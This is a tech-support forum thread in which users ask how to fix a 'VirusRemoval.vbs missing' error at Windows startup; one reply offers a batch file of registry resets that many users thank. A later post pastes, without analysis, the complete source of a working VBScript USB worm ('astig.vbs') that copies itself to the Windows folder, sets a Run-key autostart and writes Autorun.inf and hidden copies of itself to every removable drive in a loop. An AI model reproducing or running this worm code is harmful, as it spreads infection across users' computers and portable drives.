Previous Topic Next Topic

Virus removal. vbs

Solved/Closed
Amal - Jun 16, 2008 at 03:42 AM
 Madm - May 29, 2013 at 05:51 PM
Hello,
WHen i restart my computer, i get an error message saying that "VirusRemoval.vbs" missing. How can i remove this one. Thank you.

Amal
Related:

10 responses

Answer 1 / 10
Sajal Shrestha
Jul 29, 2008 at 10:39 AM
just open your Notepad and type the below code and save it as sajal.bat and put it in your desktop and run it.
cd\
del /a /f /s VirusRemoval.vbs

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe",
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001
reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
vinycool
Sep 20, 2008 at 03:41 AM
hi sajal this is veenit here i also face same problem of vbs script i tried your dat file but it shows error too command line prameters pls help me
gopal agarwal
Oct 26, 2008 at 02:20 AM
friend,
i was suffered from the virus removal.vbs for many days.
today i got the solution provided by u on yahoo group.and i did wat u directed it works but yet i am not confirmed that it works.anyways thanx very much.hope i can get more solutions from you.
simbadking
Dec 5, 2008 at 06:54 AM
Hi Sajal

Thanks dear for ur solution for removal.vbs , thnks i got rid of that problem
Rajeev
Dec 14, 2008 at 01:03 PM
Hi Sajal,

Iam really very very thankfull to you,bcoz i 2 got rid of this problem.Can i get your email-id.

Thanks,
Rajeev
Rinku Saini
Oct 10, 2009 at 10:05 PM
Thx Sajal,
yaar u r genius .ur .bat file trick 100% working for me.i was very need.Lagge raho munna bhai.........................
Answer 2 / 10
Amol
Sep 6, 2008 at 02:22 AM
Hi Sajal,

Thanks for your batch file.
I have used your batch file in my computer. I could remove "virus removal.vbs" error.


Regards,
Amol
Answer 3 / 10
Ash
Oct 1, 2008 at 03:06 AM
Hi Saja,

Perfect solution - THX.
Answer 4 / 10
rocking
Jan 28, 2009 at 05:02 PM
thanx buddy,
editting thru regedit helped...
thnx
Answer 5 / 10
gopal agarwalla
Dec 19, 2008 at 11:00 PM
thanx dear sir,i did wat u have guided me to remove the removal.vbs, and surprisingly i worked,thanx agaian.i will need ur valued help in future also,ur great social work via computer is highly be appriciated in all aspect,
yours
gopal agarwalla
Answer 6 / 10
Eng.Khaled
Apr 3, 2010 at 04:32 AM
Sajal has the best answer..thank you
Answer 7 / 10
wilhelm
Jul 16, 2010 at 08:58 AM
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou, kk, hh

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "astig.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\astig.vbs")

Set myFile = fso.CreateTextFile(win & "\astig.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\astig.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\astig.vbs"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Command=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set hh = fso.CreateTextFile(myFlashDrive.Path & "\ReadMeFirst.txt", true)
hh.write "[DeleteSolutionVirus]" & vbCrLf & "This program is a code of Solution Virus, but " & vbCrLf & "it delete a virus called Solution.vbs" & vbCrLf & "hope you like it folks!" & vbCrLf & "\m/ :-) myRules (-: \m/"
hh.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\ReadMeFirst.txt")
fAttr.Attributes=32

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\astig.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\astig.vbs")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If

If tf <> win & "\astig.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
Answer 8 / 10
wilhelm
Jul 16, 2010 at 08:59 AM
Hi to all please kindly give me the solution for this problem.. thanks you so much
Answer 9 / 10
Ambucias Posts 47310 Registration date Monday February 1, 2010 Status Moderator Last seen February 15, 2023 11,166
Jul 16, 2010 at 04:41 PM
Hello Wilhelm

The solution was already provided to you! Please use the batch file provided by another user in this thread which was a succesful solution.

Regards
Answer 10 / 10
rajesh
Apr 20, 2013 at 01:09 AM
Thanks its working

Similar discussions

Using attrib -h -r -s /s /d g:\*.* I could not wipe the attributes of my externa
jwtingley -
ac3mark -

Hello,

Following the advise in https://ccm.net/computing/windows/1469-show-hidden-files-on-windows/, I was not able to wipe the attributes of my files. Access was denied.

Is there anything else I can do to regain control of my files. I have a DVD recorder that records in .MP4, but I can only access (see) the files from the recorder. My computer shows the files (when I connect the HDD to the PC) but I cannot run any of them, nor can I copy or move them onto my computer.

I would like to clear the HDD of files and place them on my PC and watch them from there, but so far I have not been successful.

I have looked at the registry a...

1 response
attrib -h -r -s /s /d g:\*.* did not work for me
johnmenard -
Ambucias -

I type "attrib -h -r -s /s /d g:\*.*" in the command prompt just like in your other discussion to recover files that are hidden by recycler virus but the "access denies" takes for ever to load that it took me an hour to finally just close it and not 5 min in your other discussion.
The device is a external storage of seagate with 1T and partiton in 4.
I only recover 1 partiton the other 3 takes forever to load when I type the command and the "access denies takes 7-8 lines" not 4-5 lines as what you said in other discussion.

Is There another way to recover the files?

1 response
Access Denied Attrib Functions
grwilso2 -
Promomilia -

Trying to view files previously (and purposely) hidden in command prompt. Attrib functions return "access denied" on every single file. Please help! Thanks!

I Downloaded USBFix and ran the report. here it is:

Trying to view files previously (and purposely) hidden in command prompt. Attrib functions return "access denied" on every single file. Please help! Thanks!

I Downloaded USBFix and ran the report. here it is:

[b]############################## | UsbFix V 9.035 | [Clean][/b]

User: Grant (Administrator) # UNAMEIT
Updated 18/03/2017 by SOSVirus
Started at 10:58:18 | 18/03/2017

Website : [url=https://...

2 responses
attrib -h -r -s /s /d g:\*.* -->
Prabhanjan -
KY_WD -

Hello,



kindly help me explanation about this command attrib -h -r -s /s /d g:\*.* -->

Thanks & Regards,
T.Prabhanjan Kumar

1 response
uuuuuuuu.uuu SD card virus problem
pravin -
xpcman -

Hello,

Hello
My 16gb Samsung memory card is infected with UUUUUU.uuu ! When ever I copy some stuff to my card after that files got courrept and named as UUUUUUU.uuu files so please provide me the solution?

1 response